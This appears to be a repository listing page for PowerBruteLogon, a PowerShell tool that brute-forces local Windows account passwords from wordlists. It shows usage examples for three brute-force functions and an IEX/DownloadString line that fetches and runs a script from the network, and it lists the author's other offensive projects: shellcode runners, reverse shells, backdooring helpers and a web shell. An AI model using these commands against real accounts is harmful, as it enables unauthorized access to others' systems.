• Stars
    star
    105
  • Rank 328,196 (Top 7 %)
  • Language
    PowerShell
  • License
    Apache License 2.0
  • Created about 3 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

PowerBruteLogon (Ported version of WinBruteLogon in pure PowerShell)

PowerBruteLogon

PowerBruteLogon is a ported version of WinBruteLogon in pure PowerShell

⚠️ Notice: this version is slower than WinBruteLogon but has the serious advantage of being 100% entirely coded in PowerShell. In a near future, password attempts will be distributed to separate threads to speed up the process. Also keep in mind that this method is very noisy, each failed attempt will get logged on Microsoft Windows Event Logs.

You might find useful information about the technique used in this PoC here


Usage

You can use this PowerShell Application whether as a PowerShell Script or as a PowerShell Module.

Import a new PowerShell Module (Generic Explanation)

To be available, the module must first be present in a registered module path.

You can list module paths with following command:

Write-Output $env:PSModulePath

Example Output:

C:\Users\Phrozen\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules

Copy the module file <module_name>.psm1 to desired module path.

You can use bellow command to check if your module was successfully imported:

Get-Module -ListAvailable

Example Output:

PS C:\Users\Phrozen\Desktop> Get-Module -ListAvailable


    Directory: C:\Users\Phrozen\Documents\WindowsPowerShell\Modules


ModuleType Version    Name                                ExportedCommands
---------- -------    ----                                ----------------
Manifest   <version>  <module_name>                       <available_exported_commands>

<..snip..>

If you don't see them, run the following commands and check back.

Import-Module <module_name>

Import-Module <module_name>

Import a new PowerShell Script (Generic Explanation)

It is not mandatory to install this application as a PowerShell module (Even if file extension is *.psm1)

You can also load it as a PowerShell Script. Multiple methods exists including:

Invoking Commands Using:

IEX (Get-Content .\<module_name>.psm1 -Raw)

Loading script from a remote location:

IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/<module_name>.psm1')

Available Functions

Invoke-BruteLogonAccount
Invoke-BruteLogonList
Invoke-BruteAvailableLogons

Invoke-BruteLogonAccount

Attempt to recover the password of a single defined Windows User Account.

Parameters
Parameter Type Default Description
Username (*) String None Target Microsoft Windows local user account
WordList (*) String None Text file location containing password candidates

* = Mandatory Options

Example
Invoke-BruteLogonAccount -Username "darkcodersc" -Wordlist "C:\Temp\Wordlist.txt"`

Invoke-BruteLogonAccount

Invoke-BruteLogonList

Attempt to recover the password of a list of Windows User Account.

Parameters
Parameter Type Default Description
UserList (*) String None Text file location containing user candidates
WordList (*) String None Text file location containing password candidates

* = Mandatory Options

Example
Invoke-BruteLogonList -UserList "C:\Temp\users.txt" -WordList "C:\Temp\Wordlist.txt"

Invoke-BruteLogonAccount

Invoke-BruteLogonList

Attempt to recover the password of all available local Windows User Accounts.

Parameters
Parameter Type Default Description
IgnoreUsers Array Of String None A list of usernames to ignore
WordList (*) String None Text file location containing password candidates

* = Mandatory Options

Example
Invoke-BruteAvailableLogons -WordList "C:\Temp\Wordlist.txt"

Invoke-BruteAvailableLogons -WordList "C:\Temp\Wordlist.txt" -IgnoreUsers "Phrozen"

Invoke-BruteLogonAccount

Account Lockout Behaviour

PowerBruteLogon supports account lockout detection. When account lockout is configured on Windows (⚠️ recommended).

You will see the following message printed on screen:

Invoke-BruteLogonAccount

Remove progress bar

You might find the PowerShell progressbar ennoying, for this reason you might want to remove bellow code:

# Display Progress / Stats
$perc = [math]::Round((100 * $currPos) / $candidateCount)
$activity = [string]::Format("Testing candidate ""{0}"" for username ""{1}""", $candidate, $targetUser)
$status = [string]::Format("$perc% Complete:{0}/{1}", $currPos, $candidateCount)

Write-Progress -Activity $activity -Status $status -PercentComplete $perc

Disclaimer

We are doing our best to prepare the content of this app. However, PHROZEN SASU and / or Jean-Pierre LESUEUR cannot warranty the expressions and suggestions of the contents, as well as its accuracy. In addition, to the extent permitted by the law, PHROZEN SASU and / or Jean-Pierre LESUEUR shall not be responsible for any losses and/or damages due to the usage of the information on our app.

By using our app, you hereby consent to our disclaimer and agree to its terms.

Any links contained in our app may lead to external sites are provided for convenience only. Any information or statements that appeared in these sites or app are not sponsored, endorsed, or otherwise approved by PHROZEN SASU and / or Jean-Pierre LESUEUR. For these external sites, PHROZEN SASU and / or Jean-Pierre LESUEUR cannot be held liable for the availability of, or the content located on or through it. Plus, any losses or damages occurred from using these contents or the internet generally.


Made with ❤️ in 🇫🇷

More Repositories

1

PowerRemoteDesktop

Remote Desktop entirely coded in PowerShell.
PowerShell
1,906
star
2

win-brute-logon

Crack any Microsoft Windows users password without any privilege (Guest account included)
Pascal
992
star
3

SubSeven

SubSeven Legacy Official Source Code Repository
Pascal
525
star
4

PowerRunAsSystem

Run application as system with interactive system process support (active Windows session)
PowerShell
187
star
5

PsyloDbg

User-friendly Microsoft Windows Debugger for Malware Analysts.
Pascal
168
star
6

PowerRunAsAttached

This script allows to spawn a new interactive console as another user account in the same calling console (console instance/window).
PowerShell
82
star
7

run-as-attached-networked

RunAsAttached is a program to run a console as another user and keep new console attached to caller console. Support reverse shell mode (Ex: Netcat)
Pascal
69
star
8

DLest

Pascal
67
star
9

inno-shellcode-example

Run shellcode through InnoSetup code engine.
Inno Setup
64
star
10

SharpShellPipe

This lightweight C# demo application showcases interactive remote shell access via named pipes and the SMB protocol.
C#
59
star
11

PowerAssembly

Map remote .NET assemblies to memory for further invocation.
PowerShell
36
star
12

RunAsAttached

RunAsAttached is a program to locally run a new terminal as another user without spawning a new console window.
Pascal
36
star
13

run-as

Simple RunAs program for Windows.
Pascal
32
star
14

PowerRemoteDesktop_LogonUI

WinLogon I/O (LogonUI) Plugin for PowerRemoteDesktop
C#
25
star
15

pe-code-cave-helper

PE File Code Cave Helper (Backdooring and/or Basic Section Obfuscation)
Python
18
star
16

ADS-Revealer

Pascal
17
star
17

dll-export-list

Pascal
16
star
18

nasm-shell-pp

Uses NASM Shell Tool from Metasploit to friendly export Python / C / CPP shellcode from assembly instructions.
Python
16
star
19

execute-shellcode-pgext

Postgres Extension to Execute Shellcodes
C
15
star
20

Sub7Fun

Pascal
11
star
21

peof-detector

Little project that use my tiny library to handle PE File EOF Data.
Pascal
11
star
22

slae32-crypters

SLAE32 Assignment N°7 - Crypters
Pascal
11
star
23

eof-reader

C++/ CLI implementation of my read EOF Data from PE File lib.
C++
10
star
24

freepbx-shell-admin-module

FreePBX PHP Web Shell Admin Module
PHP
10
star
25

slae32-xor-encoder

Shellcode Encoder using XOR. Supports bad characters.
Python
10
star
26

YASE-Encoder

Yet Another Sub Encoder (YASE)
Python
10
star
27

darkcodersc

9
star
28

slae32-reverse-shell

SLAE32 Certification Assignment 2
Python
8
star
29

peb-update-debug-flag

Alter the debug flag, using PEB.
Pascal
7
star
30

Snippets

Repository that will progressively hold tiny projects and code snippets.
Pascal
7
star
31

tcp-bindshell-shellcode-slae32

TCP Bindshell Shellcode + Builder (SLAE32 Certification Exam)
Assembly
7
star
32

slae32-polymophism

SLAE32 Assignment N°6 - Create up to three polymorphic version of shellcodes.
Assembly
6
star
33

slae32-egghunters

SLAE32 Assignment 3 : Egg Hunters
C
5
star
34

darkcodersc.github.io

HTML
3
star